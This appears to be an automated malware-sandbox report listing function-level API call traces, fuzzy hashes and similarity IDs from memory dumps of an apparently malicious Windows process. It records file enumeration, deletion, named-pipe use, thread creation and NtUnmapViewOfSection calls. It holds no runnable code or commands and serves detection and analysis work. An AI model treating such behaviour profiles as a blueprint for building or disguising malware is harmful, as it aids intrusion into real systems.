Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
